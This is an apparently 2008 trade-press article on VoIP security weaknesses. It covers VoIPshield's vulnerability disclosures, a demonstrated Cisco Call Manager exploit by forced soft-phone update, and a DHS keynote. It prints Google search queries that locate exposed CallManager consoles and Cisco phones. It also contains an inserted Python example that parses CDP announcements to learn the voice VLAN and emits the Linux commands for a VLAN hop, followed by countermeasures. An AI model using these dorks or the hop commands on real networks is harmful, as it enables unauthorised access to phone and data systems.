When It Comes to VoIP, Beware Of The Weak Spots


The vendors began cooperating and acknowledging the risks to their VoIP systems on their Web sites, but only after VoIPshield kept reporting the vulnerabilities publicly. Nortel credited VoIPshield with a vulnerability report on April 10, for example.

In the data world, regulation and customer pressure push vendors to announce vulnerabilities publicly. There is no comparable requirement in the voice world, so disclosure is left to the vendors' discretion, and so far they have not been up front with customers. Examiners are not pushing either: FDIC examiners are not yet asking about VoIP, according to VoIPshield.

This is the state of VoIP security today. Most of the 300,000 privately owned IP-PBX systems deployed throughout the U.S. are wide open to anyone who wants to hack them, and that is only the tip of the iceberg.

Originally adopted to save on call costs, VoIP systems are now being integrated with data LANs to form unified communication platforms. The ambitions of VoIP vendors like Cisco and Microsoft reach deep into the data stack: by combining instant messaging, presence awareness and other communication channels into a single platform, users can stay in touch with everyone at all times. Microsoft touts this highly integrated VoIP architecture with its Office Communications Server 2007.


Those who believe in the new architecture and convert must understand that their integrated VoIP platforms sit in close contact with their data LANs. That is where things can go awry quickly.

An Eye-Opener
Ottawa-based VoIPshield showed us an attack launched from outside a firewall using a known vulnerability in Cisco's Call Manager 5.0. First of all, a quick Google search for Call Manager gave us an eye-opening experience.

Cut and paste the following query into Google's search bar (the operator and its argument must not be separated by a space):
inurl:"ccmadmin" intext:CallManager

Not every link returned leads to an exposed Call Manager; look for results titled "Cisco Unified CallManager Console." Click one of those and you will find a CallManager administration interface wide open to the Web.

When contacted about this article, Cisco had no comment. This is public information, so we are not divulging any secrets. VoIPshield and the Test Center did, however, agree not to release further details of the exploit. There are many other searches that reveal far more about how to gain access to VoIP systems.

Ignorance may be bliss, but not with VoIP. Over the years, the misconception that phone systems are isolated boxes that only carry voice, combined with the lack of information from vendors, has led many administrators to believe it is acceptable to expose their call manager Web interfaces to the Internet.

For the exploit, VoIPshield researchers used one laptop to connect to a Cisco Call Manager and a second laptop running a Cisco soft phone to watch the Call Manager's responses. All the tools needed was the IP address of the call manager.

Once connected, the researchers pushed a forced update to the soft phones. The update carried an executable that gave the researchers full control of the users' corporate computers; it took effect only after a reboot. Because the executable was bundled as part of the Cisco soft phone application, personal firewalls and anti-malware software did not detect it.

It Gets Better
If that still hasn't shocked you, here is another Google query that lets attackers find Cisco phones themselves:
inurl:NetworkConfiguration cisco

Keep in mind that phones can be found exposed to an external network. From there, attackers can quickly learn what they need to go after the Call Manager that serves the exposed phones.

The NetworkConfiguration search exposes phone IP addresses and, for some results, brings up the phone's own network configuration page, which lists the IP addresses of its call manager and TFTP server. One search, one click, and there you go!

Since VoIP shares the switching fabric with data LANs, attackers can use a free utility called VoIPhopper to jump between voice and data VLANs. The tool works the way a phone does when it boots: it listens for the switch's CDP or LLDP-MED announcements (or spoofs a phone to elicit them), learns the voice VLAN ID, and then tags its own traffic with that ID. For anyone with access to a phone port this is by far the easiest way to bypass firewalls and just about all IDS software on the market, because those controls are not in the path of the hop. What's more, crafted VoIP packets can slip past today's IDS stacks, so even in a multilayered corporate intranet or WAN, a direct attack can give hackers unprecedented access to internal systems.
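The hop described above rests on one piece of information the switch volunteers: the voice VLAN ID carried in its CDP announcement. The following added example (written for this page, not code from VoIPhopper or from the article) builds a constructed CDP payload like one a Cisco access switch would send, parses the TLVs to recover the native and voice VLAN IDs, and returns the Linux commands that turn that knowledge into a tagged interface on the voice VLAN. Switch name, port, platform and VLAN numbers are invented; the checksum field is left as zero and is not verified.

```python
"""Recover the voice VLAN from a CDP announcement and show what a hop does with it.

Added example for this page; not VoIPhopper's code.  The CDP payload built by
build_sample_cdp() is constructed: device name, port, platform and VLAN IDs are
invented, and the checksum is left as zero (a real frame carries a ones'-
complement checksum, which this parser does not check).  The payload is what
follows the SNAP header in a frame sent to 01:00:0c:cc:cc:cc.
"""
import struct

# CDP TLV types used here (type and length fields are 16-bit, length includes the header)
CDP_DEVICE_ID = 0x0001
CDP_PORT_ID = 0x0003
CDP_PLATFORM = 0x0006
CDP_NATIVE_VLAN = 0x000A
CDP_VOIP_VLAN_REPLY = 0x000E   # 1 byte appliance ID + 2 byte voice VLAN ID


def _tlv(tlv_type, value):
    return struct.pack("!HH", tlv_type, 4 + len(value)) + value


def build_sample_cdp():
    """Constructed CDP v2 payload (TTL 180 s) as a switch would send it on an
    access port with a data VLAN of 20 and a voice VLAN of 200."""
    tlvs = (
        _tlv(CDP_DEVICE_ID, b"SW-LOBBY-1")
        + _tlv(CDP_PORT_ID, b"FastEthernet0/7")
        + _tlv(CDP_PLATFORM, b"cisco WS-C2960-24PC-L")
        + _tlv(CDP_NATIVE_VLAN, struct.pack("!H", 20))
        + _tlv(CDP_VOIP_VLAN_REPLY, b"\x01" + struct.pack("!H", 200))
    )
    return struct.pack("!BBH", 2, 180, 0) + tlvs   # version, TTL, checksum


def parse_cdp(payload):
    """Walk the TLVs and return the fields an attacker cares about."""
    if len(payload) < 4:
        raise ValueError("truncated CDP header")
    version, ttl, _checksum = struct.unpack("!BBH", payload[:4])
    if version not in (1, 2):
        raise ValueError("unsupported CDP version %d" % version)
    info = {"version": version, "ttl": ttl}
    off = 4
    while off + 4 <= len(payload):
        tlv_type, length = struct.unpack("!HH", payload[off:off + 4])
        if length < 4 or off + length > len(payload):
            raise ValueError("malformed TLV at offset %d" % off)
        value = payload[off + 4:off + length]
        if tlv_type == CDP_DEVICE_ID:
            info["device_id"] = value.decode("ascii", "replace")
        elif tlv_type == CDP_PORT_ID:
            info["port_id"] = value.decode("ascii", "replace")
        elif tlv_type == CDP_PLATFORM:
            info["platform"] = value.decode("ascii", "replace")
        elif tlv_type == CDP_NATIVE_VLAN and len(value) >= 2:
            info["native_vlan"] = struct.unpack("!H", value[:2])[0]
        elif tlv_type == CDP_VOIP_VLAN_REPLY and len(value) >= 3:
            info["voice_vlan"] = struct.unpack("!H", value[1:3])[0]
        off += length
    return info


def vlan_hop_commands(info, iface="eth0"):
    """The Linux equivalent of what a VLAN-hopping tool does once it knows the
    voice VLAN: add an 802.1Q subinterface and request a lease on it.  Returned
    as strings for inspection, not executed."""
    vid = info["voice_vlan"]
    sub = "%s.%d" % (iface, vid)
    return [
        "ip link add link %s name %s type vlan id %d" % (iface, sub, vid),
        "ip link set %s up" % sub,
        "dhclient %s" % sub,
    ]


if __name__ == "__main__":
    details = parse_cdp(build_sample_cdp())
    print(details)
    for cmd in vlan_hop_commands(details):
        print(cmd)
```

Nothing in the exchange authenticates the listener: any device on the port that receives the announcement learns the voice VLAN, which is why the standard countermeasures are to stop advertising it on user-facing ports, require 802.1X before a port carries anything, and treat the voice VLAN as untrusted rather than as a security boundary.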

Let's just say, if banks can be extorted, anyone is vulnerable. Most administrators don't realize that VoIP phones sit in hostile environments: where contractors work, in lobby areas and in hotel rooms. Simply walk into a bank and ask to use a phone, and almost no one would think twice about leaving you unattended with it.

With 20 employees, VoIPshield is working to establish itself as a security vendor. The company is one of the first to do this sort of work, but its technology is largely unknown. Like the more established data security vendors, VoIPshield uses its security alerts to earn the vendors' respect and the market's trust. It offers two key products to partners and customers: VoIPaudit and VoIPguard.

Data VARs should seize the opportunity these flaws present by offering customers security scans with the VoIPaudit technology.

VoIPaudit audits VoIP infrastructure by automatically discovering devices and services and then testing them for vulnerabilities. VoIPguard comes with two detection engines. One is signature-based and matches traffic against the vulnerabilities in its database. The other tries to discern whether traffic is malicious by examining logged events, protocol usage and general IP-PBX traffic behavior. Both products receive updates through a subscription service.

U.S. Cyber Chief: 'The Right Balances'
When considering the investments needed to shore up the security of the Internet, there are lessons to be learned from America's founding era, according to Rod Beckstrom, director of the National Cyber Security Center (NCSC) in the U.S. Department of Homeland Security. In his keynote at Black Hat in Las Vegas earlier this month, Beckstrom referenced the managerial capacities of Abraham Lincoln and of George Mason, author of the 1776 Virginia Declaration of Rights, and said the DNS vulnerability underscores the critical need for government and the IT industry to boost investment in protecting key protocols, including BGP, SMS/IP and even POTS (plain old telephone service). He noted that during natural disasters SMS has proven to be an extremely resilient form of communication. He also said that the rising tide of cybercrime dictates a need for stronger security, that privacy must be preserved at the same time, and that the IT security industry will play a central role in striking the proper balance between the two.